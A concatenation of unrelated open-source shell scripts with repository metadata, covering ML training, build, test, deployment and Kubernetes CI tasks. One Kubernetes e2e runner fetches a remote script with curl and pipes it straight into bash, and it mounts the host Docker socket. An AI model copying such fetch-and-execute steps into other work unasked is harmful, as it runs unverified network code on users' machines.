python testing/test_firethorn_logged_vo_json.py > logs/logfile.txt
|
stvoutsin/pyrothorn
|
scripts/tests/test14-nohup.sh
|
Shell
|
gpl-3.0
| 982 |
#!/usr/bin/env bash
sudo pacman -S $(pacman -Ssq xf86-|grep xf86-)
|
NoviceLive/unish
|
scripts/pkgs/xf86.sh
|
Shell
|
gpl-3.0
| 69 |
#!/bin/bash
seed=2016
gpu_id=0
batchsize=16
opt=Adam
lr=0.001
adam_alpha=0.0001
n_encdec=4
result_dir=results_opt-${opt}_lr-${lr}_alpha-${adam_alpha}_`date "+%Y-%m-%d_%H%M%S"`
if [ -z ${snapshot_epoch} ]; then
snapshot_epoch=10
fi
if [ -z ${epoch} ]; then
epoch=300
fi
init_train () {
CHAINER_SEED=${seed} CHAINER_TYPE_CHECK=0 python train.py \
--seed 2016 \
--gpus ${gpu_id} \
--batchsize ${batchsize} \
--opt ${opt} \
--lr ${lr} \
--adam_alpha ${adam_alpha} \
--snapshot_epoch ${snapshot_epoch} \
--valid_freq ${snapshot_epoch} \
--result_dir ${result_dir} \
--n_encdec ${n_encdec} \
--mean data/train_mean.npy \
--std data/train_std.npy \
--use_class_weight \
--rotate \
--fliplr \
--class_weight data/train_origcw.csv \
--epoch $1 \
--train_depth 1
}
train () {
CHAINER_SEED=${seed} CHAINER_TYPE_CHECK=0 python train.py \
--seed 2016 \
--gpus ${gpu_id} \
--batchsize ${batchsize} \
--opt ${opt} \
--lr ${lr} \
--adam_alpha ${adam_alpha} \
--snapshot_epoch ${snapshot_epoch} \
--valid_freq ${snapshot_epoch} \
--result_dir ${result_dir} \
--n_encdec ${n_encdec} \
--mean data/train_mean.npy \
--std data/train_std.npy \
--use_class_weight \
--rotate \
--fliplr \
--class_weight data/train_origcw.csv \
--train_depth $1 \
--resume $2 \
--epoch $3
}
finetune () {
CHAINER_SEED=${seed} CHAINER_TYPE_CHECK=0 python train.py \
--seed 2016 \
--gpus ${gpu_id} \
--batchsize ${batchsize} \
--opt ${opt} \
--lr ${lr} \
--adam_alpha ${adam_alpha} \
--snapshot_epoch ${snapshot_epoch} \
--valid_freq ${snapshot_epoch} \
--result_dir ${result_dir} \
--n_encdec ${n_encdec} \
--mean data/train_mean.npy \
--std data/train_std.npy \
--use_class_weight \
--rotate \
--fliplr \
--class_weight data/train_origcw.csv \
--train_depth $1 \
--resume $2 \
--epoch $3 \
--finetune
}
init_train ${epoch}
train 2 ${result_dir}/encdec1_epoch_${epoch}.trainer `expr ${epoch} \* 2`
train 3 ${result_dir}/encdec2_epoch_`expr ${epoch} \* 2`.trainer `expr ${epoch} \* 3`
train 4 ${result_dir}/encdec3_epoch_`expr ${epoch} \* 3`.trainer `expr ${epoch} \* 4`
finetune 4 ${result_dir}/encdec4_epoch_`expr ${epoch} \* 4`.trainer `expr ${epoch} \* 5`
|
mitmul/chainer-segnet
|
experiments/train_origcw.sh
|
Shell
|
gpl-3.0
| 2,372 |
#!/bin/bash
press_enter()
{
echo -en "\nPress Enter to continue"
read
clear
}
option=
algorithm=
until [ "$option" = "q" ]; do
echo "
ALBERT CHECKSUM CHECKER
This script's purpose is to act as a multi-algorithm chechsum checher.
Available options:
f, F - Display free disk space
i, I - Display free memory
q - exit program
"
echo -n "Enter option: "
read option
echo ""
case $option in
f|F ) echo "USE CHECKSUM FILE
Choose algorithm:
m,M - Use MD5 algorithm
1 - Use SHA-1 algorithm
256 - Use SHA-256 algorithm
512 - Use SHA-512 algorithm
"
echo -n "Enter algorithm: "
read algorithm
echo ""
case $algorithm in
m|M ) echo "MD5";press_enter;;
1 ) echo "SHA1";press_enter;;
256 ) echo "SHA256";press_enter;;
512 ) echo "SHA256";press_enter;;
* ) echo "Please enter one of the available algorithms";;
esac
;;
i|I ) echo "Input sum
Returning to menu..." ;;
q|Q ) exit ;;
* ) echo "Please enter f, F, i, I, or q, Q"
esac
done
|
albertaparicio/s-checker
|
tests/schk.sh
|
Shell
|
gpl-3.0
| 1,099 |
#!/bin/sh
Mlog -x "$SQL_CLIENT < $TSTSRCBASE/$TSTDIR/../01.sql"
Mlog -x "$SQL_CLIENT < $TSTSRCBASE/$TSTDIR/../02.sql"
Mlog -x "$SQL_CLIENT < $TSTSRCBASE/$TSTDIR/../03.sql"
Mlog -x "$SQL_CLIENT < $TSTSRCBASE/$TSTDIR/../04.sql"
Mlog -x "$SQL_CLIENT < $TSTSRCBASE/$TSTDIR/../05.sql"
Mlog -x "$SQL_CLIENT < $TSTSRCBASE/$TSTDIR/../06.sql"
Mlog -x "$SQL_CLIENT < $TSTSRCBASE/$TSTDIR/../07.sql"
Mlog -x "$SQL_CLIENT < $TSTSRCBASE/$TSTDIR/../08.sql"
Mlog -x "$SQL_CLIENT < $TSTSRCBASE/$TSTDIR/../09.sql"
Mlog -x "$SQL_CLIENT < $TSTSRCBASE/$TSTDIR/../10.sql"
Mlog -x "$SQL_CLIENT < $TSTSRCBASE/$TSTDIR/../11.sql"
Mlog -x "$SQL_CLIENT < $TSTSRCBASE/$TSTDIR/../12.sql"
Mlog -x "$SQL_CLIENT < $TSTSRCBASE/$TSTDIR/../13.sql"
Mlog -x "$SQL_CLIENT < $TSTSRCBASE/$TSTDIR/../14.sql"
Mlog -x "$SQL_CLIENT < $TSTSRCBASE/$TSTDIR/../15.sql"
Mlog -x "$SQL_CLIENT < $TSTSRCBASE/$TSTDIR/../16.sql"
Mlog -x "$SQL_CLIENT < $TSTSRCBASE/$TSTDIR/../17.sql"
Mlog -x "$SQL_CLIENT < $TSTSRCBASE/$TSTDIR/../18.sql"
Mlog -x "$SQL_CLIENT < $TSTSRCBASE/$TSTDIR/../19.sql"
Mlog -x "$SQL_CLIENT < $TSTSRCBASE/$TSTDIR/../20.sql"
Mlog -x "$SQL_CLIENT < $TSTSRCBASE/$TSTDIR/../21.sql"
Mlog -x "$SQL_CLIENT < $TSTSRCBASE/$TSTDIR/../22.sql"
|
zyzyis/monetdb
|
sql/benchmarks/tpch/LOCKED/Tests/01-22.SQL.sh
|
Shell
|
mpl-2.0
| 1,199 |
#! /bin/bash -e
ROOT=$(readlink -f "$(dirname "$0")")
cp "$ROOT"/head.png "$ROOT"/../head.png
cp "$ROOT"/head.png "$ROOT"/../bed.png
|
platsch/OctoPNP
|
octoprint_OctoPNP/cameras/dummy/grab.sh
|
Shell
|
agpl-3.0
| 136 |
#!/bin/bash
VERBOSE=1
fjcsv2sglf="../fjcsv2sglf"
#$fjcsv2sglf ../test-data/035e.tagset ../test-data/test0/035e.fjcsv
pos8count=`$fjcsv2sglf ../test-data/035e.tagset ../test-data/test1/035e.fjcsv | cut -f1 -d, | grep -P '^035e\.00\.0008\.' | wc -l | cut -f1 -d' '`
pos9count=`$fjcsv2sglf ../test-data/035e.tagset ../test-data/test1/035e.fjcsv | cut -f1 -d, | grep -P '^035e\.00\.0009\.' | wc -l | cut -f1 -d' '`
if [[ "$pos8count" == "0" ]] || [[ "$pos9count" == "0" ]] ; then
echo "FAIL: could not find tile position 035e.00.0008 or 035e.00.0009 (md5 hash collision test)"
exit 1
fi
if [[ "$VERBOSE" == "1" ]] ; then
echo "ok md5-collision-test"
fi
####
####
if [[ "$VERBOSE" == "1" ]] ; then
echo ok
fi
exit 0
|
curoverse/l7g
|
tools/fjcsv2sglf/tests/run-tests.sh
|
Shell
|
agpl-3.0
| 729 |
#!/usr/bin/env bash
pm2 startOrRestart /home/ubuntu/API/processes.json
|
GHImplementationTeam/API
|
ApplicationStart.sh
|
Shell
|
agpl-3.0
| 72 |
#!/bin/bash
[ -f /usr/src/app/app/config.json ] || exit 1;
[ -f /usr/src/app/app/users.json ] || exit 2;
|
kkkyyy03/docker-server-management-tools
|
panel/check.sh
|
Shell
|
agpl-3.0
| 106 |
#!/bin/sh
echo "mail filter" >> /tmp/test
cat > /tmp/mail
cat /tmp/mail
|
posteo/scrambler-plugin
|
dovecot/script/mail-filter.sh
|
Shell
|
agpl-3.0
| 74 |
#!/bin/bash -e
#
# Copyright (C) 2020-present ScyllaDB
#
#
# SPDX-License-Identifier: AGPL-3.0-or-later
#
PROGRAM=$(basename $0)
print_usage() {
echo "Usage: $PROGRAM [OPTION]..."
echo ""
echo " --mode MODE The build mode of 'scylla' to verify (options: 'release', 'dev', and 'debug')."
exit 1
}
if which podman > /dev/null 2>&1 ; then
contool=podman
elif which docker > /dev/null 2>&1 ; then
contool=docker
else
echo "Please make sure you have either podman or docker installed on this host in order to use dist-chec"
exit 1
fi
while [ $# -gt 0 ]; do
case "$1" in
"--mode")
MODE=$2
shift 2
;;
"--help")
print_usage
;;
*)
print_usage
;;
esac
done
if [ -z "$MODE" ]; then
print_usage
fi
if [ -f /.dockerenv ]; then
echo "error: running $PROGRAM in container is not supported, please run on host."
exit 1
fi
container_images=(
docker.io/centos:7
)
for container_image in "${container_images=[@]}"
do
container_script="${container_image//:/-}"
install_sh="$(pwd)/tools/testing/dist-check/$container_script.sh"
if [ -f "$install_sh" ]; then
$contool run -i --rm -v $(pwd):$(pwd) $container_image /bin/bash -c "cd $(pwd) && $install_sh --mode $MODE"
else
echo "internal error: $install_sh does not exist, please create one to verify packages on $container_image."
exit 1
fi
done
|
scylladb/scylla
|
tools/testing/dist-check/dist-check.sh
|
Shell
|
agpl-3.0
| 1,482 |
#!/bin/bash
PID=`ps -ef | grep marytts | grep -v grep | awk '{print $2}'`
if [[ "" != "$PID" ]]; then
echo "Kill process $PID"
kill -9 $PID
fi
|
BrutusTT/yasp
|
scripts/stopMary.sh
|
Shell
|
agpl-3.0
| 153 |
#!/bin/bash
# init $PATH
source /etc/profile
if grep -q $BASHPID -r /sys/fs/cgroup/systemd/backup.slice
then rsync "$@"
else systemd-run --slice backup.slice --scope "$0" "$@"
fi
|
orezpraw/scripts
|
rsync-wrapper.sh
|
Shell
|
agpl-3.0
| 187 |
#!/usr/bin/env bash
#
# Script called by Terraform to do all the things (for the Base image)
# just like we used to in the 90s. Things must go in Chef!
#
set -e -o -x errexit
#
# Pre-reqs
#
yum install -y unzip
#
# Consul client
#
mkdir -p /etc/consul.d/client/
mv /tmp/consul_client_config.json /etc/consul.d/client/config.json
mkdir -p /var/consul/dist
mkdir -p /var/consul/dist
#
# Consul template
#
curl -L "https://releases.hashicorp.com/consul-template/0.18.1/consul-template_0.18.1_linux_amd64.zip" -o /tmp/consul-template_0.18.1_linux_amd64.zip
unzip /tmp/consul-template_0.18.1_linux_amd64.zip -d /usr/local/bin
chmod u+x /usr/local/bin/consul-template
pushd /tmp
curl -L "https://releases.hashicorp.com/consul/0.7.5/consul_0.7.5_linux_amd64.zip" -o /tmp/consul_0.7.5_linux_amd64.zip
unzip consul_0.7.5_linux_amd64.zip
mv consul /usr/local/bin/
chmod u+x /usr/local/bin/consul
systemctl enable consul
popd
#
# Consul Template
#
pushd /tmp
curl -L "https://releases.hashicorp.com/consul-template/0.18.1/consul-template_0.18.1_linux_amd64.zip" -o /tmp/consul-template_0.18.1_linux_amd64.zip
unzip consul-template_0.18.1_linux_amd64.zip
mv consul-template /usr/local/bin/
chmod u+x /usr/local/bin/consul-template
popd
|
Klazomenai/rehab.earth
|
terraform/base/scripts/all_the_things.sh
|
Shell
|
agpl-3.0
| 1,230 |
#!/bin/bash
# set default parameters
stencil_spec=""
arch="x86_64 AVX"
#arch_set="false"
#verb="codegen"
strategy="$PATUS_HOME/strategy/cacheblocked.stg"
#outdir="$PWD/out"
unroll="1,2,4,8"
create_inline_asm="yes"
moreargs=""
# accuracy tolerance
# --validation-tolerance=1e-3
### ------------------------------------------------------------ ###
stencil_name="hinterp.stc"
stencil_path="dsl/$stencil_name"
echo
echo $stencil_name
patus --outdir=temp/$stencil_name --strategy=$strategy --unroll=$unroll --stencil=$stencil_path --architecture=$arch
cd temp/$stencil_name
make
./bench 62 64 8 8 8 2
cd ../..
stencil_name="vinterp.stc"
stencil_path="dsl/$stencil_name"
echo
echo $stencil_name
patus --outdir=temp/$stencil_name --strategy=$strategy --unroll=$unroll --stencil=$stencil_path --architecture=$arch
cd temp/$stencil_name
make
./bench 62 64 8 8 8 2
cd ../..
|
bcosenza/patus
|
tune/patus_hvinter.sh
|
Shell
|
lgpl-2.1
| 877 |
#!/bin/bash
fileinput=$1
fileAS=answerset.txt
first=1 # var to start create a new file for the answer sets
startwrite=0 # var to mark when to start/finish redirect graph output to *.dot file
while read LINE
do
if [ "$LINE" = "ANSWER SET" ];
then read LINE # skip the number
read LINE # this is the answer set
if [ "$first" = "1" ];
then echo $LINE > $fileAS
first=0
else echo $LINE >> $fileAS
fi
fi
if [ "$LINE" = "==== call graph end here ====" ]; # ending of call graph output
then startwrite=0
fi
if [ "$startwrite" = "1" ]; # redirect the output into a file
then echo $LINE >> $fileresult
fi
if [ "$LINE" = "==== call graph begin here ====" ]; # the beginning of redirection
then startwrite=1
read LINE
fileresult=$LINE
read LINE
echo $LINE > $fileresult
fi
done < $fileinput
|
hexhex/core
|
src/postpross.sh
|
Shell
|
lgpl-2.1
| 886 |
#!/bin/bash
# Magic
latest="$(wget -O - https://github.com/cogneco/magic/releases/latest | grep -o -m 1 '\<download/.*tar.gz\>')"
wget https://github.com/cogneco/magic/releases/$latest
echo ${latest##*/}
tar zxvf ${latest##*/}
# Rock
if [ "$(uname -o)" == "Msys" ]; then
latest="$(wget -O - https://github.com/cogneco/rock/releases/latest | grep -o '\<download/rock_.*zip\>')"
wget https://github.com/cogneco/rock/releases/$latest
echo ${latest##*/}
7z e ${latest##*/}
else
latest="$(wget -O - https://github.com/cogneco/rock/releases/latest | grep -o '\<download/rock_.*deb\>')"
wget https://github.com/cogneco/rock/releases/$latest
echo ${latest##*/}
dpkg-deb -x ${latest##*/} .
mv usr/bin/rock .
mv usr/lib/fancy_backtrace.so .
fi
|
davidhesselbom/ooc-kean
|
tools/ci/install_ci_tools.sh
|
Shell
|
lgpl-3.0
| 744 |
#!/bin/bash
# 下面需要修改的地方
# 1、HOME=/data/zach根据自己建的目录
export HOME=/data/zach
export DOMAIN_HOME=${HOME}/domain
export LOG_HOME=${HOME}/logs
export TOMCAT_HOME=${HOME}/server
#Variable settings begin
# 下面需要修改的地方
# 1、export projectName=center 服务名称,即war包名称
# 2、export httpPort=7001 启动接收请求端口端口
# 3、export serverPort=8001 tomcat启动的本地端口
export projectName=center
export httpPort=7001
export serverPort=8001
export minMsMem=3200m
export maxMsMem=3200m
export ssMem=300k
export mnMem=1100m
export survivorRatior=2
export minPermSize=250m
export maxPermSize=300m
export threshold=20
export fraction=60
export pageSize=128m
export warFile=${HOME}/center_webapps # 服务名加webapps war包地址
export logFile=${LOG_HOME}/${projectName}/catalina.$(date +'%Y-%m-%d').out
export pidFile=${LOG_HOME}/${projectName}.pid
export LD_LIBRARY_PATH=/usr/local/apr/lib
export heapDumpPath=${DOMAIN_HOME}/${projectName}/heapDump
#Variable settings end
#JVM args settings begin
# 下面需要修改的地方:
# 1、Dtjtag=center服务名称
CATALINA_OPTS="-server -Dtjtag=center -Dtomcat.server.port=${serverPort} -Dtomcat.http.port=${httpPort} -Dtomcat.deploy.home=${warFile}"
CATALINA_OPTS="${CATALINA_OPTS} -Xms${minMsMem} -Xmx${maxMsMem} -Xss${ssMem} -Xmn${mnMem} -XX:SurvivorRatio=${survivorRatior} -XX:PermSize=${minPermSize} -XX:MaxPermSize=${maxPermSize}"
CATALINA_OPTS="${CATALINA_OPTS} -XX:+UseCompressedOops -XX:+TieredCompilation -XX:+AggressiveOpts -XX:+UseBiasedLocking"
CATALINA_OPTS="${CATALINA_OPTS} -XX:+DisableExplicitGC -XX:+UseConcMarkSweepGC -XX:+UseParNewGC -XX:+CMSParallelRemarkEnabled -XX:+UseCMSCompactAtFullCollection -Xnoclassgc -XX:MaxTenuringThreshold=${threshold} -XX:CMSInitiatingOccupancyFraction=${fraction} -XX:LargePageSizeInBytes=${pageSize} -XX:+UseFastAccessorMethods -XX:+UseCMSInitiatingOccupancyOnly -XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=${heapDumpPath}"
#JVM args settings end
export CATALINA_BASE=${DOMAIN_HOME}/${projectName}
export CATALINA_OPTS
export CATALINA_OUT="${logFile}"
export CATALINA_PID="${pidFile}"
export CATALINA_OPTS
${TOMCAT_HOME}/bin/catalina.sh start
|
WZQ1397/automatic-repo
|
shell/tomcat/startcenter.sh
|
Shell
|
lgpl-3.0
| 2,226 |
#!/bin/bash
export LD_LIBRARY_PATH=/home/leooo/Workspace/hex/libboost_1_45_0/lib:$LD_LIBRARY_PATH
src/benzenetest/benzenetest
|
l3o0o/benzene
|
test.sh
|
Shell
|
lgpl-3.0
| 127 |
#!/bin/bash
# Copyright (c) 2021 Damien Ciabrini
# This file is part of ngdevkit
set -ue
# Disable verbose to prevent leaking credentials
set +x
help() {
echo "Usage: $0 --slug=\"{~user}/{ppa}/+git/{package}\" --name=\"{launchpad-key-name}\"" >&2
exit ${1:-0}
}
error() {
echo "Error: $1" >&2
help 1
}
# ----------------- config parsing -----------------
#
DRYRUN=
OPTS=$(/usr/bin/getopt -n $0 --long help,dry-run,slug:,name: -- $0 $@)
if [ $? != 0 ]; then
error "parsing arguments failed"
fi
eval set -- "$OPTS"
while true; do
case "$1" in
--help) help;;
--dry-run ) DRYRUN=1; shift ;;
--slug ) SLUG="$2"; shift 2 ;;
--name ) NAME="$2"; shift 2 ;;
-- ) shift; break ;;
* ) break ;;
esac
done
if [ -z "$SLUG" ]; then
error "no user specified"
fi
if [ -z "$NAME" ]; then
error "no Launchpad key specified"
fi
if [ -z "$LAUNCHPAD_TOKEN" ]; then
error "no token specified for env variable LAUNCHPAD_TOKEN"
fi
if [ -z "$LAUNCHPAD_TOKEN_SECRET" ]; then
error "no token secret specified for env variable LAUNCHPAD_TOKEN_SECRET"
fi
# ----------------- garbage-collect nightly tags that match regex -----------------
#
# Build authentication string
TIMESTAMP=$(date +%s)
NONCE=$(python3 -c 'import string; import secrets; print("".join((secrets.choice(string.ascii_letters+string.digits) for i in range(36))))')
AUTH="OAuth oauth_consumer_key=\"${NAME}\", oauth_nonce=\"${NONCE}\", oauth_signature=\"%26${LAUNCHPAD_TOKEN_SECRET}\", oauth_signature_method=\"PLAINTEXT\", oauth_timestamp=\"${TIMESTAMP}\", oauth_token=\"${LAUNCHPAD_TOKEN}\", oauth_version=\"1.0\""
# Call "code import" to force Launchpad to sync its git remote and rebuild
OUT=$(curl --dump-header - -X POST -H "Authorization: ${AUTH}" --data "ws.op=requestImport" https://api.launchpad.net/1.0/${SLUG}/+code-import)
if ! echo $OUT | grep HTTP | grep -qw 200; then
echo "failed to call +code-import:" >&2
echo $OUT >&2
exit 1
fi
echo "Launchpad code import API called succesfully"
|
dciabrin/ngdevkit
|
.ci/trigger-launchpad-build.sh
|
Shell
|
lgpl-3.0
| 2,059 |
#
# .--------------. .----------------. .------------.
# | .------------. | .--------------. | .----------. |
# | | ____ ____ | | | ____ ____ | | | ______ | |
# | ||_ || _|| | ||_ \ / _|| | | .' ___ || |
# ___ _ __ ___ _ __ | | | |__| | | | | | \/ | | | |/ .' \_|| |
# / _ \| '_ \ / _ \ '_ \ | | | __ | | | | | |\ /| | | | || | | |
# (_) | |_) | __/ | | || | _| | | |_ | | | _| |_\/_| |_ | | |\ `.___.'\| |
# \___/| .__/ \___|_| |_|| ||____||____|| | ||_____||_____|| | | `._____.'| |
# | | | | | | | | | | | |
# |_| | '------------' | '--------------' | '----------' |
# '--------------' '----------------' '------------'
#
# openHMC - An Open Source Hybrid Memory Cube Controller
# (C) Copyright 2014 Computer Architecture Group - University of Heidelberg
# www.ziti.uni-heidelberg.de
# B6, 26
# 68159 Mannheim
# Germany
#
# Contact: [email protected]
# http://ra.ziti.uni-heidelberg.de/openhmc
#
# This source file is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This source file is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this source file. If not, see <http://www.gnu.org/licenses/>.
#
#
#!/bin/bash
function print_help {
printf "Usage: %s: [-c] [-d DUT] [-f FPW] [-g] [-l NUM_LANES] [o] [-q] [-p] [-s SEED] [-t TEST_NAME] [-v UVM_VERBOSITY] -?\n" $(basename $0) >&2
}
#-----------------------------------------------------------------
# set defaults
if [ ! $CAG_DUT ]
then
CAG_DUT="default"
fi
#-- Controller params
num_lanes="default"
log_num_lanes="3"
fpw="default"
log_fpw="2"
do_clean_up=
tflag="0"
dflag="0"
test_name=
verbosity="UVM_LOW"
use_gui=
input_file="-input ${CAG_TB_DIR}/build/ncsim.tcl"
seed=""
num_axi_bytes="64"
enable_coverage=""
#-- parse options
while getopts 'cgot:v:d:s:l:f:q?' OPTION
do
case $OPTION in
c) do_clean_up=1
;;
d) export CAG_DUT=${OPTARG}
dflag="1"
;;
f) fpw="${OPTARG}"
;;
g) use_gui="+gui"
;;
l) num_lanes="${OPTARG}"
;;
s) seed="+svseed+${OPTARG}"
;;
t) tflag="1"
test_name="$OPTARG"
;;
v) verbosity="$OPTARG"
;;
o) enable_coverage="-coverage all -covoverwrite"
;;
q) input_file=""
verbosity="UVM_NONE"
;;
?) print_help
exit 2
;;
esac
done
shift $(($OPTIND - 1))
printf "****************************************************\n"
printf "****************************************************\n"
#-- Set up controller
if [ $num_lanes == "default" ]
then
printf "No link-width specified. Defaulting to 8 lanes \n"
else
if [ $num_lanes != "8" -a $num_lanes != "16" ]
then
printf "Unsupported link-width specified. Defaulting to 8 lanes\n"
else
if [ $num_lanes == "16" ]
then
log_num_lanes="4"
export X16
fi
printf "Link width set: $num_lanes lanes\n"
fi
fi
if [ $fpw == "default" ]
then
printf "No FPW specified. Defaulting to FPW=4 (512bit datapath)\n"
fpw="4"
else
if [ $fpw != "2" -a $fpw != "4" -a $fpw != "6" -a $fpw != "8" ]
then
printf "Unsupported FPW specified. Defaulting to FPW=4 (512bit datapath)\n"
fpw="4"
else
printf "FPW set: $fpw\n"
case $fpw in
2)
log_fpw="1"
num_axi_bytes="32"
;;
4)
log_fpw="2"
;;
6)
log_fpw="3"
num_axi_bytes="96"
;;
8)
log_fpw="3"
num_axi_bytes="128"
;;
esac
fi
fi
#-- check test
if [ "$tflag" == "0" ]
then
printf "Test defaulted to simple_test.\n"
test_name="simple_test"
fi
#-- select DUT
if [ "$dflag" == "0" ]
then
printf "DUT is default: ${CAG_DUT}\n"
else
echo "DUT used: ${CAG_DUT}"
fi
CAG_TB_COMPILE_IUS="${CAG_TB_DIR}/build/compile_ius_${CAG_DUT}.f"
printf "****************************************************\n"
printf "****************************************************\n"
#-- do some clean up
if [ "$do_clean_up" ]
then
echo "Removing old build files..."
${CAG_TB_DIR}/../run/clean_up.sh
fi
#-- all other stuff
echo "Starting the verification environment..."
irun ${input_file} \
-f ${CAG_TB_COMPILE_IUS} \
${enable_coverage} \
-access +rwc \
${use_gui} "+UVM_TESTNAME=${test_name}" "+UVM_VERBOSITY=${verbosity}" ${seed} \
"-define LOG_NUM_LANES=$log_num_lanes -define FPW=$fpw -define LOG_FPW=$log_fpw -define AXI4BYTES=$num_axi_bytes" $*
|
nliu96/openHMC_Altera
|
sim/tb/run/run_files/run.sh
|
Shell
|
lgpl-3.0
| 4,923 |
#!/bin/sh
# using average option, negative values from a pipe, with decimal part
cat > data << EOF
1
2
3
4
2
EOF
if test 2.000000 = "`numaverage -m data`" ; then
rm -f data
else
exit 1
fi
|
serge-sans-paille/num-utils-ng
|
tests/testaverage12.sh
|
Shell
|
lgpl-3.0
| 190 |
PREFIX="/manylines"
function prefixPaths() {
sed -i '' "s@href=\"/\([^/]\)@href=\"$PREFIX/\1@g" $1;
sed -i '' "s@src=\"/\([^/]\)@src=\"$PREFIX/\1@g" $1;
sed -i '' "s@var PATH_PREFIX = '';@var PATH_PREFIX = '$PREFIX';@g" $1;
}
echo "Cleanup..."
rm -rf build
mkdir build
echo "Copying files..."
cp -r static/* build/
echo "Bootstrapping archived data"
sed -i '' 's/<body>/<body archived="true">/' build/embed.html
echo "Prefixing paths..."
prefixPaths build/app.html
prefixPaths build/embed.html
prefixPaths build/site.html
echo "Building HTML architecture..."
cp build/site.html build/index.html
mkdir build/app
mkdir build/embed
cp build/app.html build/app/index.html
cp build/embed.html build/embed/index.html
echo "Grabbing presentations..."
find ./presentations -type d ! -name index.html -depth 1 -exec cp -r {} build/ \;
|
medialab/manylines
|
build.sh
|
Shell
|
lgpl-3.0
| 839 |
gcc -O3 -c gpioFastLib2.c
gcc -O3 -o gpio_tst fastlib_tst.c gpioFastLib2.o
gcc -O3 -o ledpanel ledpanel_exe.c gpioFastLib2.o
|
cledic/Acqua_SAMA5D3
|
gpioFastLib/compila_gpio.sh
|
Shell
|
lgpl-3.0
| 125 |
#!/bin/bash
# Copyright 2016 The Kubernetes Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Save environment variables in $WORKSPACE/env.list and then run the Jenkins e2e
# test runner inside the kubekins-test Docker image.
set -o errexit
set -o nounset
set -o pipefail
export REPO_DIR=${REPO_DIR:-$(pwd)}
export HOST_ARTIFACTS_DIR=${WORKSPACE}/_artifacts
mkdir -p "${HOST_ARTIFACTS_DIR}"
env -u HOME -u PATH -u PWD -u WORKSPACE >${WORKSPACE}/env.list
# Add all uncommented lines for metadata.google.internal in /etc/hosts to the
# test container.
readonly METADATA_SERVER_ADD_HOST_ARGS=($(
grep '^[0-9a-fA-F\.:]\+ \+metadata\.google\.internal' /etc/hosts |\
cut -f1 -d' ' |\
xargs -r printf -- '--add-host="metadata.google.internal:%s"\n'))
docker_extra_args=()
if [[ "${JENKINS_ENABLE_DOCKER_IN_DOCKER:-}" =~ ^[yY]$ ]]; then
docker_extra_args+=(\
-v /var/run/docker.sock:/var/run/docker.sock \
-v "$(which docker)":/bin/docker:ro \
-v "${REPO_DIR}":/go/src/k8s.io/kubernetes \
-e "REPO_DIR=${REPO_DIR}" \
-e "HOST_ARTIFACTS_DIR=${HOST_ARTIFACTS_DIR}" \
)
fi
docker run --rm=true -i \
-v "${WORKSPACE}/_artifacts":/workspace/_artifacts \
-v /etc/localtime:/etc/localtime:ro \
-v /var/lib/jenkins/gce_keys:/workspace/.ssh:ro \
--env-file "${WORKSPACE}/env.list" \
-e "HOME=/workspace" \
-e "WORKSPACE=/workspace" \
"${docker_extra_args[@]:+${docker_extra_args[@]}}" \
"${METADATA_SERVER_ADD_HOST_ARGS[@]:+${METADATA_SERVER_ADD_HOST_ARGS[@]}}" \
gcr.io/google_containers/kubekins-test:0.11 \
bash -c "bash <(curl -fsS --retry 3 'https://raw.githubusercontent.com/kubernetes/kubernetes/master/hack/jenkins/e2e-runner.sh')"
|
Kaffa-MY/kubernetes
|
hack/jenkins/dockerized-e2e-runner.sh
|
Shell
|
apache-2.0
| 2,222 |
#!/bin/bash
# Copyright 2014 The Kubernetes Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
ZONE=${KUBE_AWS_ZONE:-us-west-2a}
MASTER_SIZE=${MASTER_SIZE:-t2.micro}
MINION_SIZE=${MINION_SIZE:-t2.micro}
NUM_MINIONS=${NUM_MINIONS:-4}
# Optional: Set AWS_S3_BUCKET to the name of an S3 bucket to use for uploading binaries
# (otherwise a unique bucket name will be generated for you)
# AWS_S3_BUCKET=kubernetes-artifacts
# Because regions are globally named, we want to create in a single region; default to us-east-1
AWS_S3_REGION=${AWS_S3_REGION:-us-east-1}
INSTANCE_PREFIX="${KUBE_AWS_INSTANCE_PREFIX:-kubernetes}"
CLUSTER_ID=${INSTANCE_PREFIX}
AWS_SSH_KEY=${AWS_SSH_KEY:-$HOME/.ssh/kube_aws_rsa}
IAM_PROFILE_MASTER="kubernetes-master"
IAM_PROFILE_MINION="kubernetes-minion"
LOG="/dev/null"
MASTER_NAME="${INSTANCE_PREFIX}-master"
MINION_NAMES=($(eval echo ${INSTANCE_PREFIX}-minion-{1..${NUM_MINIONS}}))
MASTER_TAG="${INSTANCE_PREFIX}-master"
MINION_TAG="${INSTANCE_PREFIX}-minion"
MINION_IP_RANGES=($(eval echo "10.244.{1..${NUM_MINIONS}}.0/24"))
MINION_SCOPES=""
POLL_SLEEP_INTERVAL=3
SERVICE_CLUSTER_IP_RANGE="10.0.0.0/16" # formerly PORTAL_NET
MASTER_IP_RANGE="${MASTER_IP_RANGE:-10.246.0.0/24}"
# If set to Elastic IP, master instance will be associated with this IP.
# If set to auto, a new Elastic IP will be aquired
# Otherwise amazon-given public ip will be used (it'll change with reboot).
MASTER_RESERVED_IP="${MASTER_RESERVED_IP:-}"
# When set to true, Docker Cache is enabled by default as part of the cluster bring up.
ENABLE_DOCKER_REGISTRY_CACHE=true
# Optional: Install node monitoring.
ENABLE_NODE_MONITORING="${KUBE_ENABLE_NODE_MONITORING:-true}"
# Optional: When set to true, heapster, Influxdb and Grafana will be setup as part of the cluster bring up.
